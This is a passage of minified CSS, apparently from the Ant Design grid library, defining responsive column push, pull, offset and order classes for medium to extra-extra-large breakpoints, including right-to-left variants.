.ant-col-md-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-md-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-md-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-md-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-md-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-md-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-md-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-md-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-md-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-md-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-md-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-md-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-md-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-md-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-md-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-md-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-md-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-md-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-md-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-md-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-md-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-md-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-md-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-md-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-md-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-md-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-md-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-md-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-md-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-md-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-md-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-md-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-md-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-md-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-md-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-md-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-md-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-md-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-md-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-md-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-md-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-md-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-md-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-md-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } } @media (min-width: 992px) { .ant-col-lg-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-lg-push-24 { left: 100%; } .ant-col-lg-pull-24 { right: 100%; } .ant-col-lg-offset-24 { margin-left: 100%; } .ant-col-lg-order-24 { order: 24; } .ant-col-lg-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-lg-push-23 { left: 95.83333333%; } .ant-col-lg-pull-23 { right: 95.83333333%; } .ant-col-lg-offset-23 { margin-left: 95.83333333%; } .ant-col-lg-order-23 { order: 23; } .ant-col-lg-22 { display: block; flex: 0 0 91.66666667%; max-width: 91.66666667%; } .ant-col-lg-push-22 { left: 91.66666667%; } .ant-col-lg-pull-22 { right: 91.66666667%; } .ant-col-lg-offset-22 { margin-left: 91.66666667%; } .ant-col-lg-order-22 { order: 22; } .ant-col-lg-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-lg-push-21 { left: 87.5%; } .ant-col-lg-pull-21 { right: 87.5%; } .ant-col-lg-offset-21 { margin-left: 87.5%; } .ant-col-lg-order-21 { order: 21; } .ant-col-lg-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-lg-push-20 { left: 83.33333333%; } .ant-col-lg-pull-20 { right: 83.33333333%; } .ant-col-lg-offset-20 { margin-left: 83.33333333%; } .ant-col-lg-order-20 { order: 20; } .ant-col-lg-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-lg-push-19 { left: 79.16666667%; } .ant-col-lg-pull-19 { right: 79.16666667%; } .ant-col-lg-offset-19 { margin-left: 79.16666667%; } .ant-col-lg-order-19 { order: 19; } .ant-col-lg-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-lg-push-18 { left: 75%; } .ant-col-lg-pull-18 { right: 75%; } .ant-col-lg-offset-18 { margin-left: 75%; } .ant-col-lg-order-18 { order: 18; } .ant-col-lg-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-lg-push-17 { left: 70.83333333%; } .ant-col-lg-pull-17 { right: 70.83333333%; } .ant-col-lg-offset-17 { margin-left: 70.83333333%; } .ant-col-lg-order-17 { order: 17; } .ant-col-lg-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-lg-push-16 { left: 66.66666667%; } .ant-col-lg-pull-16 { right: 66.66666667%; } .ant-col-lg-offset-16 { margin-left: 66.66666667%; } .ant-col-lg-order-16 { order: 16; } .ant-col-lg-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-lg-push-15 { left: 62.5%; } .ant-col-lg-pull-15 { right: 62.5%; } .ant-col-lg-offset-15 { margin-left: 62.5%; } .ant-col-lg-order-15 { order: 15; } .ant-col-lg-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-lg-push-14 { left: 58.33333333%; } .ant-col-lg-pull-14 { right: 58.33333333%; } .ant-col-lg-offset-14 { margin-left: 58.33333333%; } .ant-col-lg-order-14 { order: 14; } .ant-col-lg-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-lg-push-13 { left: 54.16666667%; } .ant-col-lg-pull-13 { right: 54.16666667%; } .ant-col-lg-offset-13 { margin-left: 54.16666667%; } .ant-col-lg-order-13 { order: 13; } .ant-col-lg-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-lg-push-12 { left: 50%; } .ant-col-lg-pull-12 { right: 50%; } .ant-col-lg-offset-12 { margin-left: 50%; } .ant-col-lg-order-12 { order: 12; } .ant-col-lg-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-lg-push-11 { left: 45.83333333%; } .ant-col-lg-pull-11 { right: 45.83333333%; } .ant-col-lg-offset-11 { margin-left: 45.83333333%; } .ant-col-lg-order-11 { order: 11; } .ant-col-lg-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-lg-push-10 { left: 41.66666667%; } .ant-col-lg-pull-10 { right: 41.66666667%; } .ant-col-lg-offset-10 { margin-left: 41.66666667%; } .ant-col-lg-order-10 { order: 10; } .ant-col-lg-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-lg-push-9 { left: 37.5%; } .ant-col-lg-pull-9 { right: 37.5%; } .ant-col-lg-offset-9 { margin-left: 37.5%; } .ant-col-lg-order-9 { order: 9; } .ant-col-lg-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-lg-push-8 { left: 33.33333333%; } .ant-col-lg-pull-8 { right: 33.33333333%; } .ant-col-lg-offset-8 { margin-left: 33.33333333%; } .ant-col-lg-order-8 { order: 8; } .ant-col-lg-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-lg-push-7 { left: 29.16666667%; } .ant-col-lg-pull-7 { right: 29.16666667%; } .ant-col-lg-offset-7 { margin-left: 29.16666667%; } .ant-col-lg-order-7 { order: 7; } .ant-col-lg-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-lg-push-6 { left: 25%; } .ant-col-lg-pull-6 { right: 25%; } .ant-col-lg-offset-6 { margin-left: 25%; } .ant-col-lg-order-6 { order: 6; } .ant-col-lg-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-lg-push-5 { left: 20.83333333%; } .ant-col-lg-pull-5 { right: 20.83333333%; } .ant-col-lg-offset-5 { margin-left: 20.83333333%; } .ant-col-lg-order-5 { order: 5; } .ant-col-lg-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-lg-push-4 { left: 16.66666667%; } .ant-col-lg-pull-4 { right: 16.66666667%; } .ant-col-lg-offset-4 { margin-left: 16.66666667%; } .ant-col-lg-order-4 { order: 4; } .ant-col-lg-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-lg-push-3 { left: 12.5%; } .ant-col-lg-pull-3 { right: 12.5%; } .ant-col-lg-offset-3 { margin-left: 12.5%; } .ant-col-lg-order-3 { order: 3; } .ant-col-lg-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-lg-push-2 { left: 8.33333333%; } .ant-col-lg-pull-2 { right: 8.33333333%; } .ant-col-lg-offset-2 { margin-left: 8.33333333%; } .ant-col-lg-order-2 { order: 2; } .ant-col-lg-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-lg-push-1 { left: 4.16666667%; } .ant-col-lg-pull-1 { right: 4.16666667%; } .ant-col-lg-offset-1 { margin-left: 4.16666667%; } .ant-col-lg-order-1 { order: 1; } .ant-col-lg-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-lg-push-0 { left: auto; } .ant-col-lg-pull-0 { right: auto; } .ant-col-lg-offset-0 { margin-left: 0; } .ant-col-lg-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-lg-push-0.ant-col-rtl { right: auto; } .ant-col-lg-pull-0.ant-col-rtl { left: auto; } .ant-col-lg-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-lg-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-lg-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-lg-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-lg-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-lg-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-lg-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-lg-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-lg-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-lg-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-lg-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-lg-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-lg-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-lg-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-lg-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-lg-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-lg-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-lg-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-lg-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-lg-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-lg-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-lg-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-lg-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-lg-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-lg-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-lg-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-lg-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-lg-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-lg-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } .ant-col-lg-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-lg-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-lg-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-lg-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-lg-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-lg-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-lg-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-lg-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-lg-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-lg-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-lg-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-lg-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-lg-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-lg-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-lg-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-lg-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-lg-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-lg-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-lg-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-lg-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-lg-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-lg-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-lg-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-lg-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-lg-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-lg-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-lg-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-lg-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-lg-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-lg-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-lg-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-lg-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-lg-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-lg-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-lg-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-lg-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-lg-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-lg-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-lg-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-lg-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-lg-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-lg-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-lg-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-lg-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } } @media (min-width: 1200px) { .ant-col-xl-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-xl-push-24 { left: 100%; } .ant-col-xl-pull-24 { right: 100%; } .ant-col-xl-offset-24 { margin-left: 100%; } .ant-col-xl-order-24 { order: 24; } .ant-col-xl-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-xl-push-23 { left: 95.83333333%; } .ant-col-xl-pull-23 { right: 95.83333333%; } .ant-col-xl-offset-23 { margin-left: 95.83333333%; } .ant-col-xl-order-23 { order: 23; } .ant-col-xl-22 { display: block; flex: 0 0 91.66666667%; max-width: 91.66666667%; } .ant-col-xl-push-22 { left: 91.66666667%; } .ant-col-xl-pull-22 { right: 91.66666667%; } .ant-col-xl-offset-22 { margin-left: 91.66666667%; } .ant-col-xl-order-22 { order: 22; } .ant-col-xl-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-xl-push-21 { left: 87.5%; } .ant-col-xl-pull-21 { right: 87.5%; } .ant-col-xl-offset-21 { margin-left: 87.5%; } .ant-col-xl-order-21 { order: 21; } .ant-col-xl-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-xl-push-20 { left: 83.33333333%; } .ant-col-xl-pull-20 { right: 83.33333333%; } .ant-col-xl-offset-20 { margin-left: 83.33333333%; } .ant-col-xl-order-20 { order: 20; } .ant-col-xl-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-xl-push-19 { left: 79.16666667%; } .ant-col-xl-pull-19 { right: 79.16666667%; } .ant-col-xl-offset-19 { margin-left: 79.16666667%; } .ant-col-xl-order-19 { order: 19; } .ant-col-xl-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-xl-push-18 { left: 75%; } .ant-col-xl-pull-18 { right: 75%; } .ant-col-xl-offset-18 { margin-left: 75%; } .ant-col-xl-order-18 { order: 18; } .ant-col-xl-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-xl-push-17 { left: 70.83333333%; } .ant-col-xl-pull-17 { right: 70.83333333%; } .ant-col-xl-offset-17 { margin-left: 70.83333333%; } .ant-col-xl-order-17 { order: 17; } .ant-col-xl-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-xl-push-16 { left: 66.66666667%; } .ant-col-xl-pull-16 { right: 66.66666667%; } .ant-col-xl-offset-16 { margin-left: 66.66666667%; } .ant-col-xl-order-16 { order: 16; } .ant-col-xl-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-xl-push-15 { left: 62.5%; } .ant-col-xl-pull-15 { right: 62.5%; } .ant-col-xl-offset-15 { margin-left: 62.5%; } .ant-col-xl-order-15 { order: 15; } .ant-col-xl-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-xl-push-14 { left: 58.33333333%; } .ant-col-xl-pull-14 { right: 58.33333333%; } .ant-col-xl-offset-14 { margin-left: 58.33333333%; } .ant-col-xl-order-14 { order: 14; } .ant-col-xl-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-xl-push-13 { left: 54.16666667%; } .ant-col-xl-pull-13 { right: 54.16666667%; } .ant-col-xl-offset-13 { margin-left: 54.16666667%; } .ant-col-xl-order-13 { order: 13; } .ant-col-xl-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-xl-push-12 { left: 50%; } .ant-col-xl-pull-12 { right: 50%; } .ant-col-xl-offset-12 { margin-left: 50%; } .ant-col-xl-order-12 { order: 12; } .ant-col-xl-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-xl-push-11 { left: 45.83333333%; } .ant-col-xl-pull-11 { right: 45.83333333%; } .ant-col-xl-offset-11 { margin-left: 45.83333333%; } .ant-col-xl-order-11 { order: 11; } .ant-col-xl-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-xl-push-10 { left: 41.66666667%; } .ant-col-xl-pull-10 { right: 41.66666667%; } .ant-col-xl-offset-10 { margin-left: 41.66666667%; } .ant-col-xl-order-10 { order: 10; } .ant-col-xl-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-xl-push-9 { left: 37.5%; } .ant-col-xl-pull-9 { right: 37.5%; } .ant-col-xl-offset-9 { margin-left: 37.5%; } .ant-col-xl-order-9 { order: 9; } .ant-col-xl-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-xl-push-8 { left: 33.33333333%; } .ant-col-xl-pull-8 { right: 33.33333333%; } .ant-col-xl-offset-8 { margin-left: 33.33333333%; } .ant-col-xl-order-8 { order: 8; } .ant-col-xl-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-xl-push-7 { left: 29.16666667%; } .ant-col-xl-pull-7 { right: 29.16666667%; } .ant-col-xl-offset-7 { margin-left: 29.16666667%; } .ant-col-xl-order-7 { order: 7; } .ant-col-xl-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-xl-push-6 { left: 25%; } .ant-col-xl-pull-6 { right: 25%; } .ant-col-xl-offset-6 { margin-left: 25%; } .ant-col-xl-order-6 { order: 6; } .ant-col-xl-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-xl-push-5 { left: 20.83333333%; } .ant-col-xl-pull-5 { right: 20.83333333%; } .ant-col-xl-offset-5 { margin-left: 20.83333333%; } .ant-col-xl-order-5 { order: 5; } .ant-col-xl-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-xl-push-4 { left: 16.66666667%; } .ant-col-xl-pull-4 { right: 16.66666667%; } .ant-col-xl-offset-4 { margin-left: 16.66666667%; } .ant-col-xl-order-4 { order: 4; } .ant-col-xl-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-xl-push-3 { left: 12.5%; } .ant-col-xl-pull-3 { right: 12.5%; } .ant-col-xl-offset-3 { margin-left: 12.5%; } .ant-col-xl-order-3 { order: 3; } .ant-col-xl-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-xl-push-2 { left: 8.33333333%; } .ant-col-xl-pull-2 { right: 8.33333333%; } .ant-col-xl-offset-2 { margin-left: 8.33333333%; } .ant-col-xl-order-2 { order: 2; } .ant-col-xl-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-xl-push-1 { left: 4.16666667%; } .ant-col-xl-pull-1 { right: 4.16666667%; } .ant-col-xl-offset-1 { margin-left: 4.16666667%; } .ant-col-xl-order-1 { order: 1; } .ant-col-xl-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-xl-push-0 { left: auto; } .ant-col-xl-pull-0 { right: auto; } .ant-col-xl-offset-0 { margin-left: 0; } .ant-col-xl-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-xl-push-0.ant-col-rtl { right: auto; } .ant-col-xl-pull-0.ant-col-rtl { left: auto; } .ant-col-xl-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-xl-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-xl-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-xl-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-xl-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-xl-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-xl-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-xl-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-xl-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-xl-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-xl-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-xl-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-xl-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-xl-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-xl-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-xl-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-xl-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-xl-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-xl-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-xl-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-xl-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-xl-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-xl-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-xl-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-xl-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-xl-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-xl-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-xl-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-xl-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } .ant-col-xl-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-xl-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-xl-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-xl-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-xl-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-xl-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-xl-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-xl-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-xl-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-xl-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-xl-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-xl-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-xl-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-xl-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-xl-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-xl-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-xl-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-xl-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-xl-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-xl-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-xl-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-xl-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-xl-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-xl-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-xl-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-xl-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-xl-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-xl-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-xl-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-xl-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-xl-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-xl-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-xl-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-xl-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-xl-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-xl-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-xl-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-xl-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-xl-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-xl-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-xl-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-xl-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-xl-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-xl-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } } @media (min-width: 1600px) { .ant-col-xxl-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-xxl-push-24 { left: 100%; } .ant-col-xxl-pull-24 { right: 100%; } .ant-col-xxl-offset-24 { margin-left: 100%; } .ant-col-xxl-order-24 { order: 24; } .ant-col-xxl-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-xxl-push-23 { left: 95.83333333%; } .ant-col-xxl-pull-23 { right: 95.83333333%; } .ant-col-xxl-offset-23 { margin-left: 95.83333333%; } .ant-col-xxl-order-23 { order: 23; } .ant-col-xxl-22 { display: block; flex: 0 0 91.66666667%; max-width: 